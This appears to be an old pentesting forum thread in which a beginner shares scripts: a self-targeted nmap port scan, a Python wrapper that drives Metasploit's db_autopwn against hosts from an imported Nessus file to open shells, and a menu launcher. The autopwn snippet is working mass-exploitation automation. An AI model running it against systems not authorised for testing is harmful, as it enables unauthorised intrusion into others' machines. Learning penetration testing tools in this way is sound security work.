Results 1 to 2 of 2

Thread: Newbie Scripts

  1. #1
    Just burned his ISO Track404's Avatar
    Join Date
    Nov 2009
    Posts
    23

    Default Newbie Scripts

    I'm currently using this script on the Ubuntu 9.10 side that will port scan an assigned IP Address after it shuts down services that I have installed. I thought maybe some of you newbies may have a use for the scan side of it.

    #!/bin/sh
    # auto nmap inet addr
    var=$(expr "`ifconfig eth0`" : '.*inet addr:\([^ ]*\).*')
    sudo nmap $var -p 1-65535
    echo " "
    echo Press enter to quit
    read enter

    *remember to save the script.sh and Allowing it to execute as a program under permissions.

    If your a Newbie like me, I know you love Metasploits Autopwn feature, if you browse your Fasttrack directory /home/USER/fasttrack/bin/ftsrc in my case you will find a file named autopwn.py which begins the magic.

    So I figured why not use that python script to autopwn a Nessus.nbe. To give you an idea heres a cut out example:

    try:
    child1 = pexpect.spawn('/opt/metasploit3/msf3/msfconsole')
    # load sqlite3
    child1.sendline ('db_driver')
    # child1.sendline ('load driver sql3')
    # Destroy database
    child1.sendline ('db_destroy client')
    # Create database
    child1.sendline ('db_create client')
    # inport nbe
    child1.sendline ('db_import_nessus_nbe /home/USER/Desktop/victim.nbe')
    # run actual exploitation
    child1.sendline ('db_autopwn -t -e -x -p')
    child1.sendline ('sleep 5')
    child1.sendline ('jobs -K')
    child1.sendline ('\n\n\n')
    child1.sendline ('sessions -l')
    child1.sendline ('echo "If it states No sessions, then you were unsuccessful. Simply type sessions -i <id> to jump into a shell"')

    *Remember the extension is .py

    You can even create a script.sh and call it autopwn where you can select Nmap/Nessus

    #!/bin/sh
    echo
    echo Metasploit Autopwn
    echo
    echo "1) NMAP Autopwn"
    echo "2) Nessus Autopwn"
    echo "3) quit"
    echo
    read -p "Enter a number : " n
    if [ $n = 1 ]; then
    sudo python /home/USER/fasttrack/bin/ftsrc/autopwn.py
    elif [ $n = 2 ];
    then
    sudo python /home/USER/fasttrack/bin/ftsrc/Nessusautopwn.py
    elif [ $n = 3 ];
    then
    exit
    else
    echo "$n is not a number."
    fi
    echo
    echo Press enter to quit
    read enter

    I guess I'll end with a bit of color script:

    #!/bin/bash
    echo " "
    echo -e '\E[34;40m' "To add color to your scripts ask google he's your friend"; tput sgr0

    echo " "
    echo Press enter to quit
    read enter

    Anyway I just wanted to give the Newer Newbies an idea of some script and how useful and fun they can be.

    Thank you Remote-Exploit for allowing the average computer user to acquire pentesting tools and for giving us the knowledge to use them.

  2. #2
    Senior Member Nick_the_Greek's Avatar
    Join Date
    Jan 2010
    Location
    Greece
    Posts
    181

    Default

    Track404,
    you are on the right road.

    Give us something more advanced. You can do it better.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •